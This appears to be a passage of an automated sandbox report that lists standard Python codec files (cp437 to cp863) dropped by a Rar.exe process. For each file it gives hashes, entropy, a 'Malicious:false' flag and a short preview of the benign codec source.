                                                                                                                                                                                      SSDEEP:384:p1LnZkjh4wVdjIVjxAEJHWJn4AVEccqPMy:XqjhJVRKxAEJ2BF6S
                                                                                                                                                                                      MD5:A11E9C869BD055D6C91354FFFEB7644F
                                                                                                                                                                                      SHA1:B008E64C808A86312863C194C621214134B4C432
                                                                                                                                                                                      SHA-256:7B0A9AE2E74D370354CC60CBCFB77AF970364818BE2E2A446187DCCCF9E28ACC
                                                                                                                                                                                      SHA-512:3A628F1BB8D36845074B4FA66A8B91B5F8365C5677CC81AFA5D7DA1313F328E1B409A3C43249C9D62FADC2B71CE9E7CE70CCD3854BA7B8CBB19CFB79B8AD92FE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp437 generated from 'VENDORS/MICSFT/PC/CP437.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp437',.. encode=Codec().enc
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13428
                                                                                                                                                                                      Entropy (8bit):4.523115396759222
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ZHhsuOTDvR7UZkPS9BrG4/RVFIhRNvYkV2H2QB:8TirG4/0RYkgWQB
                                                                                                                                                                                      MD5:BEE7333323D2BCA3262F13C59414EDD3
                                                                                                                                                                                      SHA1:57E74B1BA865C5198C26344B2F6F270350C014B4
                                                                                                                                                                                      SHA-256:A5CAC573ED357CB6C2A672D01696212C25E306936586D94BE0D0130354A4DB6F
                                                                                                                                                                                      SHA-512:B9DD5137040DC57308093D9C71291668CE7CBEDCA11DBC0D85187C6DEE568CA25F69B67F7FB08A2CA248D966EC622C7CE0DD35C0BA2CD77C860274A11A50827D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp500 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP500.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp500',.. e
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13995
                                                                                                                                                                                      Entropy (8bit):4.642939154809849
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:fhsuOTDvRD9lPEeXGyQCmEdfn4OH3NGzN7KwAKYWEDdunzT:STSeXGy1dc5
                                                                                                                                                                                      MD5:9B7E8AB7C2EE4F82BE09E14F3D3AEA4C
                                                                                                                                                                                      SHA1:AA76BF3210EF70474330E0212A8B2EDEB518DC5B
                                                                                                                                                                                      SHA-256:016BDB7208A0D6BFAF8972C1F6BB4B3DE39C77E026B49ED106866D592BE4810B
                                                                                                                                                                                      SHA-512:0E706CB3E9199663D2DE2E6443F2C9E46279F11ED32BFFE482C4262D7CBD1A30F49018588F96C037E147D9DCE27F29C4ABC1EAAD230CF09B73317F5872967CCD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python Character Mapping Codec cp720 generated on Windows:..Vista 6.0.6002 SP2 Multiprocessor Free with the command:.. python Tools/unicode/genwincodec.py 720.."""#"......import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codec
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):35379
                                                                                                                                                                                      Entropy (8bit):4.616163070442315
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:VmDXpX8Jytkjh4wVoEm3clxHRE8q6HWJn4AVhUise69/TUMy:8DXizjhJVoEm3clx6y2BFH25W
                                                                                                                                                                                      MD5:BD60E98CC59C8BD60874F59A06E30F78
                                                                                                                                                                                      SHA1:D0086209BA6B3D56964EA7295A8EA54BC5AA02D7
                                                                                                                                                                                      SHA-256:F2DA9D418B2364C2E1A587B7A6E26FF5601C16AA7993070F2C955DDF2A1F860D
                                                                                                                                                                                      SHA-512:377D0F87DDBB23D9CCAABE35085EF1E92FCE766B01E55774F4371EA281A03825D141A6F905C90C419B19D09529A8185827C9F4FC6EB176BBADE3DFB478AFB1A0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp737 generated from 'VENDORS/MICSFT/PC/CP737.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp737',.. encode=Codec().enc
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):35173
                                                                                                                                                                                      Entropy (8bit):4.550355257462109
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:8HLsuYDvRxp2YM0AQ7COJgJOlSwrE0PXRN/h4wcuSMy+PeD3xUpWS2449jBRWJnI:lRNALMSkjh4wVHeahcHWJn4AVztzXsj5
                                                                                                                                                                                      MD5:CBEF285952C0476BF35BFCD7E7818919
                                                                                                                                                                                      SHA1:1C61953A3AE6638EE415CA2A93710FF3D8E59D68
                                                                                                                                                                                      SHA-256:00F2A5E71CA98ED656EC430A80FC2E971988A0A33EBDEA77661BDBE24FE2FBFF
                                                                                                                                                                                      SHA-512:2F78E73843365DB7F164C2F3C7CD2AE5860D80A11BAF9212BA54C58F9B08C99035FEF6A200D836036AF2B4F1F286B0C2447953203B0EB1C87FD5F1DBE3D24396
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp775 generated from 'VENDORS/MICSFT/PC/CP775.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp775',.. encode=Codec().enc
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34803
                                                                                                                                                                                      Entropy (8bit):4.521332806052938
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:QHLsuYDvRVSUpAJZjJBfX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxspGf6w6F44j:hbAZSkjh4wV5j9eJTHWJn4AVgqur
                                                                                                                                                                                      MD5:F5F11DA44C65B2A394A4137E36E35E82
                                                                                                                                                                                      SHA1:BD17C2F9156D704AEAB144A4C1B5B8CA436A5D73
                                                                                                                                                                                      SHA-256:DCBE5938D7FE65072D4A286A184046DB211544C30F0C3C370B9CD594CF3B36BD
                                                                                                                                                                                      SHA-512:58AE94059D5ABDC1892FE28DA1646249A0A96817B790BA468B1AA11983A8292AB1FCD1357C9EF9771DE11685FC999791DB184CAF16E7E05D634680AF8A74D6BA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP850.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp850',.. encode=Codec().encode,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):35700
                                                                                                                                                                                      Entropy (8bit):4.529290225811869
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:SHLsuYDvRzgbY6oxCzhnfnh7gwrE0PXRN/h4wcuSMyLLUhmCIbp0w449jBRWJn4d:vgCkjh4wVy/xHWJn4AV9dQr
                                                                                                                                                                                      MD5:BB2BA9443AE7BD887BA8EAC3E622366A
                                                                                                                                                                                      SHA1:777E47CA86C4CF65DA68603DDACD6C78B89E0DC7
                                                                                                                                                                                      SHA-256:8B6AD769607B3DB0D60E4BA1A6321A3823AD8460890D48C816220DCDF8CBEA98
                                                                                                                                                                                      SHA-512:EBAEC3C9AB014DD4B9629DF511D5E98A9CC88F4035841756142AFC462AB00D07B92050F62C89CF7B2C4891E7D4165F3B3C78548062AACE86E4680C6E2FF3F996
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP852.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp852',.. encode=Codec().encode,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34548
                                                                                                                                                                                      Entropy (8bit):4.55461632698867
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:PHLsuYDvR+mIj30FeMwrE0PXRN/h4wcuSM2fi+ypK2449jBRWJn4bkVd8nOiB6HL:i+0rkjh4wV8iN3HWJn4AVd8n0r
                                                                                                                                                                                      MD5:7C84762C6FD5251CD237754FEB1752D4
                                                                                                                                                                                      SHA1:B4F083D0AC32E26B77DB2E99F53C079DB7B844A1
                                                                                                                                                                                      SHA-256:F4F47A5CF3FE5A8CD269B68A73C1DC293A75CD3B9C0489CFA600919B47B35A4C
                                                                                                                                                                                      SHA-512:D841B04E354ADD8C3D337A6952163CDC8D74FE8F561418A8DEA9C7C5986EE15179F9F5B2336880ABD279CE45AA46CB55020EDE9CDF0FE8B7EA093D1033B5F108
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP855.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp855',.. encode=Codec().encode,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12730
                                                                                                                                                                                      Entropy (8bit):4.6600353742865055
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:JgHhsuOTDvRPUrXPLouhIAs2+i+/4mwNLlYip2MUo8ONT:jT5uhIAlg02MH
                                                                                                                                                                                      MD5:EE5A43420B08D06B0B2D72A49F00216D
                                                                                                                                                                                      SHA1:5CAB8D55CB2910C092AF40C921E0B0959933C216
                                                                                                                                                                                      SHA-256:F0C9DAC1B08D688B81B4F11CA603336FBD5C7FC4C1A30E8B7836283C2AD9A8E7
                                                                                                                                                                                      SHA-512:97CC6127C21CF49679AD8AC1B47D22D674A07D83BDCD7FAB54B3C821F8DC531435F3B12EE63222C92E3A9D6895404BA857926BA2CA52CDB1BD3ED51B49009C65
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp856 generated from 'MAPPINGS/VENDORS/MISC/CP856.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp856',.. encode=Cod
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34602
                                                                                                                                                                                      Entropy (8bit):4.528500526287676
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:BHLsuYDvR8LmUdMAJZjy5xSwrE0PXRN/h4wcuSMMksbYevMScnepGW449jBRWJn+:4FAcSkjh4wVMuecebHWJn4AVk2Yr
                                                                                                                                                                                      MD5:DD1F84F2921D49CF944DF4BCF6ECF7E8
                                                                                                                                                                                      SHA1:7EEE7B6CAA8120C4D26E96FCCC21C4474BD2652A
                                                                                                                                                                                      SHA-256:8AE4CB6989342105C513678480ECBDF2D5D8E534E69704964D0FB4D2A960039B
                                                                                                                                                                                      SHA-512:92DB4E13E84876B51B2600F503C56857E96F06A1F23C327762372F97628C766B0E524568672FBF3BA07B26A4284C1AEB522BD433F3ABB9704CF9277157B95832
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP857.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp857',.. encode=Codec().encode,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34713
                                                                                                                                                                                      Entropy (8bit):4.518245366498134
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:CLsuYDvR9SUpAJZjJBIX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxNpGf6w6F4490:3jAYSkjh4wV5j9e2THWJn4AVgq/r
                                                                                                                                                                                      MD5:F0B8B1B55A90C1EA058759AD18834A75
                                                                                                                                                                                      SHA1:FD7AFDDE40956991241D6130F72A40D1C655B15B
                                                                                                                                                                                      SHA-256:04A67B43EFA1E0CE2D80791C290BC2C8EA01C3991EB3DF37528B1DD575B12330
                                                                                                                                                                                      SHA-512:72F7905616B3B3F9D961E4A605B15A8B9D427E13A82B1BA9AC1F2380E961DE6848A9C5068A57DE6CF62E0CEC5D9E6C2D7310F906D0EC16CAC345E48AA1ABF352
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec for CP858, modified from cp850....."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp858',.. encode=Codec().encode,.. decode=Codec().decode,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):35379
                                                                                                                                                                                      Entropy (8bit):4.587856666654445
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:/HLsuYDvRGYj/bXdiaYzIUqwrE0PXRN/h4wcuSMBmkwNvuD8HtIMpWZEt449jBRq:SfnZkjh4wVMjNjxAEJHWJn4AVWIcOMy
                                                                                                                                                                                      MD5:1F0B22586EC65A59C966A709024E35E4
                                                                                                                                                                                      SHA1:143BCD55359AD3B9506D6583D04A8C1BF32366BD
                                                                                                                                                                                      SHA-256:E2B8B4B2658ECC3DC53D4B0760AEA95517BE298FAFBFA69574B08933747922BE
                                                                                                                                                                                      SHA-512:7859FBC58DD5B68614F3F83DA28AA600E86A6F2DB7E011870B212E4D721478A8028D893AB666212DA1B1D38D41BB9E03B985C555154E33A20D71D2449DE7FDF2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP860.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp860',.. encode=Codec().encode,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):35331
                                                                                                                                                                                      Entropy (8bit):4.588014438980019
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:FfLnZkjh4wVlPVjxAEJHWJn4AVPScqPMy:JqjhJVbxAEJ2BFDS
                                                                                                                                                                                      MD5:83CFB87E2BB8A42739A03DA1D979AF6A
                                                                                                                                                                                      SHA1:97C16F469B56F437F521C482C613D4AEC6EF3206
                                                                                                                                                                                      SHA-256:D7FE52A55FDCAC4E6E9ECDC4884C793D1FEB345D0276B074214DB1BF4BCF3033
                                                                                                                                                                                      SHA-512:589B6933A5E45176210EA18997B056F41A6B03D765668B7328577D5CF8EEC9CF55B6247E225835D4666EB2AA0714ED927902929B75E27711437612BF9463D89E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP861.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp861',.. encode=Codec().encode,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34068
                                                                                                                                                                                      Entropy (8bit):4.605627535144471
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:oPFL+DZkjh4wVOjIVjx79EJHWJn4AVE6AsqPMy:8UDqjhJVkKx79EJ2BFX7S
                                                                                                                                                                                      MD5:D22ABCA28D2425D802F53021178224A1
                                                                                                                                                                                      SHA1:D26E991DA020C07E58C03506347803A88230A6BB
                                                                                                                                                                                      SHA-256:6D99C0415136CE45AB438C8238772A1A132E7B38212C623467C2170F1A8AAE75
                                                                                                                                                                                      SHA-512:66E7C898ED749CF2706EA877FB099F50477EC5EA3C0FB4F2FA189F4E849D37AD01E7899BFC04A3D60D6CD5A1D42CFF69E71D0A39BE5F51C919543D22C2D82C6A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP862.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp862',.. encode=Codec().encode,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):34950
                                                                                                                                                                                      Entropy (8bit):4.597040843450106
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:DQ6LHZkjh4wV5VvxAEJHWJn4AV7qmqPMy:VqjhJVjxAEJ2BFtS
                                                                                                                                                                                      MD5:13279C9ED7C1F7AF8722F9EB3A1B595B
                                                                                                                                                                                      SHA1:BCF042EA7D75E802EE940B3C979626DCD0FAAD33
                                                                                                                                                                                      SHA-256:32FC23645A773EBB3247B3692D0525EA43513B358DD0350EF3A171864E326335
                                                                                                                                                                                      SHA-512:95CDDCB21D1E738A6850BEA50F6ABD8BBC537F916AC1B3BC16449710EECCDD6B9A54A584A6E40F89E3068B601F43EB297214B1585C9F658B7901BE8F1CBB5162
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
